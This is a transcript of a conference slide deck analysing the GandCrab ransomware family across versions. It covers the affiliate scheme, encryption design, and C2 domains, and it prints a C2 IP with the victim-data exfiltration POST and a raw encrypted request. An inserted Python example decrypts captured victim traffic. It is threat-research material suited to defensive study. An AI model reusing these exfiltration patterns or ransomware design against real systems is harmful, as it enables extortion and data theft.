Transcript of "GANDCRAB MENTALITY" (32 slides)

Page 1:

GANDCRAB MENTALITY

Jasper Manuel, Joie Salvio

Page 2:

GandCrab Ransomware-as-a-Service

Images by @CryptoInsane

Ransomware-as-a-Service (RaaS)
• Affiliate scheme 60-40 or 70-30
• Speed, reliability, customization
• Includes FUD, support, update
• Panel and Admin websites in TOR network
• Must not target members of Russian Commonwealth (AM, AZ, BY, RU, KZ, etc.)

Page 3:

Execution Flow

Encrypt Files

Contact C2

Delete Shadow Copies

Generate Keys

Terminate Processes

Collect Victim Information

Elevate Privilege

Page 4:

Ransom Note

Ransom Note Payment Page

Ransom Note and Payment Page

Page 5:

GandCrab v1

• First to use only DASH ($200-$1200)
• .GDCB extension / GDCB-DECRYPT.txt
• .bit TLD for C2
• Uses RSA-2048/AES-CBC

C2 domains
• gandcrab.bit
• bleepingcomputer.bit
• nomoreransom.bit
• esetnod32.bit
• emsisoft.bit

Vectors
• RIG Exploit Kit
• GRANDSOFT Exploit Kit
• SPAM

Internal Versions
• 1.0 • 1.1 • 2.1 • 2.1r • 2.2r • 2.3r • 2.3.1r

nslookup.exe <domain> a.dnspod.com

Page 6:

Encrypted File Structure

Encrypted File Content

AES Key Encrypted with RSA

Page 7:

GandCrab v1 Weaknesses
• Hard-coded RC4 key for victim info

Parameter   Description
action      always 'call'
ip          victim IP address
pc_user     username
pc_group    domain name the machine is under
pc_lang     locale (e.g. en-US)
pc-keyb     1=Russian, 0=non-Russian
os_major    Operating System (e.g. Windows 7 Ultimate)
os_bit      Operating System Architecture (e.g. x64, x86, ARM)
ransom_id   Roughly based on machine's root volume serial number
hdd         Information of all drives [<drive_letter>:_<drive_type>_<free_space>]
pub_key     RSA Public Key
priv_key    RSA Private Key
version     internal version hard-coded in the binary

Gathered Victim Info

Raw Victim Info

POST to http://<resolved-IP>/curl.php?token=<aff_id>

http://92.53.66.11/curl.php?token=1019

Page 8:

GandCrab v1 Weaknesses

RC4 Key

Encrypt data with RC4

Page 9:

GandCrab v1 Weaknesses
• CRYPT_VERIFYCONTEXT flag not set

CRYPT_VERIFYCONTEXT Flag not set

Function to generate RSA keys

Generated private key Stored locally

Page 10:

GandCrab v1

Decryptor Released

• Feb 28, Romanian Police released a decryption tool for v1
• 50,000 victims in a month
• $300k - $600k estimated payments
• Mostly US and UK

Page 11:

GandCrab v1

Decryptor Released

GandCrab breach announcement
• Payment page was compromised
• GandCrab v2 will be released soon
• Fired the web developer
• “Fortified” their infrastructures

Page 12:

GandCrab v2

• .CRAB extension / CRAB-DECRYPT.txt
• Core payload is now a DLL
• Added Info parameters: id, subid
• Fake host header: bitdefender.com

C2 domains
• gdcb.bit
• emsisoft.bit
• gandcrab.bit
• politiaromana.bit
• malwarehunterteam.bit

Internal Versions
• 1.0.0r • kto_zaskrinit_tot_pidor • 1.2.0 • 1.2.1

Page 13:

GandCrab v2

POST /loey?lfeighss=oa&eas=fai HTTP/1.1
Host: bitdefender.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Content-Length: 5880
Cache-Control: no-cache

EQp98lcg4tzXH5KsHq7sNWqdQ8tncHJCkQO62jrhXSiV7VRDI88eJ5G2658rSKgAyfPUtJlUyIk5AOI+jkGHhmGiDgiVUzJjZSJ1Xyko1hgjn5r9mohEAQrviJj7PPdgPrTO/yyJdgRxH/o09gsT+NZ3T9Ou8qFPRa+/pNA07skamoilCi/M/vzTbaDIOsOEzmMLaKRChA9VyLhBF6acBRUQRVRLTLiF+TPHPKrgLzVpasnQtEyzVWCa0ETM9CyQUsNsWL30q8eFanG5qw8WcgkTpMPfNyqF1Eo62dBj1lFVM4603G…

Host: bitdefender.com

Page 14:

Pseudo-random RC4 Key

• Pseudo-random RC4 key to encrypt victim info

CRC32 (initial crc = 0x29a (666)) of “fowge?eiplei=deoresc” → C10A57D3
Appended constant: “europol”
RC4 Key: C10A57D3europol

POST victim info to http://<resolved-IP>/<pseudo-random string>

http://92.53.66.11/fowge?eiplei=deoresc
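As an added example (not the authors' code), the following Python shows why both the v1 hard-coded RC4 key (page 7) and the v2 key derived from the pseudo-random URL path (page 14) leave the posted victim record, private key included, recoverable by anyone holding a traffic capture. The v1 key value, the CRC-32 details beyond the stated 0x29a initial value (polynomial, reflection, no final XOR), and all sample data are assumptions constructed for this example.

```python
# Added example, not from the slides: recovering the RC4-protected victim record
# from a captured POST. v1 used one hard-coded key; v2 derives the key from the
# pseudo-random URL path, which the same request exposes in its request line.
# Assumptions: the CRC-32 details beyond the 0x29a initial value (poly,
# reflection, no final XOR) and all sample data below are constructed.
from urllib.parse import parse_qs

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA then PRGA). Symmetric: the same call encrypts and decrypts.
    For v1 this call with the single hard-coded key (not on the slides) suffices."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def crc32_seeded(data: bytes, init: int = 0x29A) -> int:
    """Reflected CRC-32 (poly 0xEDB88320) seeded with 0x29a (666) instead of 0xFFFFFFFF."""
    crc = init
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ (0xEDB88320 if crc & 1 else 0)
    return crc & 0xFFFFFFFF

def v2_rc4_key(url_path: str) -> bytes:
    """v2 scheme shown on the slide: uppercase CRC hex + the constant 'europol'."""
    return f"{crc32_seeded(url_path.encode()):08X}europol".encode()

def recover_victim_info(key: bytes, body: bytes) -> dict:
    """Decrypt a captured body and split the form-encoded victim fields."""
    fields = parse_qs(rc4(key, body).decode(), keep_blank_values=True)
    return {k: v[0] for k, v in fields.items()}

# Constructed capture: the request path and the plaintext a v2 client would encrypt.
CAPTURED_PATH = "fowge?eiplei=deoresc"
SAMPLE_RECORD = (b"action=call&ip=192.0.2.10&pc_user=alice&pc_group=WORKGROUP&pc_lang=en-US"
                 b"&pc_keyb=0&version=1.2.0&priv_key=CONSTRUCTED_PRIVATE_KEY_BLOB")
CAPTURED_BODY = rc4(v2_rc4_key(CAPTURED_PATH), SAMPLE_RECORD)  # what a network sensor records

if __name__ == "__main__":
    # The key is rebuilt from the path in the same request, so priv_key is readable.
    print(recover_victim_info(v2_rc4_key(CAPTURED_PATH), CAPTURED_BODY)["priv_key"])
```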

Page 15:

Fixed CRYPT Flag

Function to generate RSA keys

Page 16:

GandCrab v2.1

• Fake host header: ahnlab.com

C2 domains
• ransomware.bit
• zonealarm.bit

Internal Versions
• 2.3.1 • 2.3.2 • 3.0.0

GandCrab 2.1 Ransom Note

Page 17:

GandCrab v3

• Changes wallpaper
• Fake host header: yahoo.com
• Adds autorun to HKLM for admin users

C2 domains
• carder.bit
• ransomware.bit

Internal Versions
• 3.0.0 • 3.0.1

GandCrab Changes Wallpaper

Page 18:

GandCrab v3 Bug

Unintentional “Lock Screen” on Windows 7 OS upon reboot

Page 19:

GandCrab v4

• Switches to RSA-Salsa20 encryption algorithm
• Encrypts offline
• Encrypts Network Shares
• Sandbox evasions (removed later)
• Anti-disassembly
• Removed wallpaper change
• Major code structure makeover

Internal Versions
• v4.0 • v4.1 • v4.1.1 • v4.1.2 • v4.1.3 • v4.1.2 (new variant) • v4.2 • v4.2.1 • v4.3 • v4.4

Victim data and key in ransom note

Page 20:

Encrypted File Structure

Encrypted File Content

Salsa20 Key Encrypted with RSA Public Key

Page 21:

Keys in the Ransom Note

32-byte Salsa20 Key

RSA-2048 Private Key

Also stored in: HKCU\Software\keys_data\data\private

Page 22:

Encrypted Keys

• RSA key pair (Public, Private) and a 32-byte Salsa20 Key
• RSA-2048 Private Key: encrypted with Salsa20
• 32-byte Salsa20 Key: encrypted with RSA (public key)

Page 23:

GandCrab v4 Timeline (July to August)

• Jul 02, v4.0: Salsa20/20 algorithm; offline encryption; encrypts network shares; checks <8hex-chars>.lock
• Jul 04, v4.1: sends victim data to a long list of URLs
• Jul 11, v4.1.1: no major changes
• Jul 13, Vaccine v1: Ahnlab releases a vaccine based on .lock filename
• Jul 17, v4.1.2: uses Salsa20 to generate the .lock filename
• Jul 18, Vaccine v2: Ahnlab releases a second version of the vaccine
• v4.1.3: no major changes
• v4.1.2 (new variant): GandCrab switches to mutex check
• v4.2: update picked up from new 4.1.2; adds sandbox evasion tricks
• v4.2.1: removes VM evasion function; adds a link to POC of a Denial-of-Service attack on Ahnlab’s AV component
• v4.3: adds anti-disassembly trick
• Aug 06, v4.4: works as a vaccine by creating the ransomware mutex. Did not work on win7 at first

Other dates marked on the slide: Jul 19, Jul 20, Aug 02

Page 24:

GandCrab v5

• <5-10_random_char> extension
• Exploits used to elevate privilege:
  • ALPC EOP Vulnerability (CVE-2018-8440)
  • Win32k EOP Vulnerability (CVE-2018-8120)
• HTML ransom note, and added support for other languages
• Wallpaper feature (in some variants)

Internal Versions
• v5.0 • v5.0.1 • v5.0.2 • v5.0.3 • v5.0.4 • v5.0.5

Page 25:

GandCrab v5 Decryptor

• GandCrab released keys for Syrian victims
• Bitdefender released free decryptor for versions v1, v4, v5 (5.0.1-5.0.4)
• Decryptor does not work on v5.0.5, released just a day after

Post of Syrian key release

Bitdefender releases free decryptor

Page 26:

Crypter partnership

• GandCrab partners with NTCrypt for a crypter service
• $100 (one-time stub), $350 (two stubs/week)

GandCrab announces “Crypt Competition”

NTCrypt wins the deal

Page 27:

Conclusion

The people behind GandCrab…

• Have good marketing skills to keep the trust of their affiliates and to build new partnerships.
• Try to compensate for the not-so-advanced malware with quick releases of new variants.
• Are very quick to react to solutions against them.
• Are loud, crazy, and very confident in what they do.

Page 28:

C2 Visit Count

[Chart: visit count (0 to 350,000) per C2 domain, by version v1, v2, v2.1, v3. Domains: ransomware.bit, politiaromana.bit, nomoreransom.bit, malwarehunter.bit, gdcb.bit, gandcrab.bit, esetnod32.bit, emsisoft.bit, bleepingcomputer.bit, carder.bit]

Page 29:

Online Infection Map

[Chart: VISIT COUNT (top 10), axis 0 to 1,500,000]

Page 30:

Move to Asian Market

• GandCrab looking for partners in a Chinese underground forum
• VenusLocker campaign targeting South Korea

Page 31:

Sample Distribution

[Chart: Samples Received Per Month (2018), axis 0 to 12,000, by version v1, v2, v3, v4, v5]

Page 32:

References

• https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/

• https://research.checkpoint.com/gandcrab-ransomware-mindset/

• https://www.bleepingcomputer.com/news/security/gandcrab-devs-release-decryption-keys-for-syrian-victims/

• Special thanks to @MarceloRivero, @ValthekOn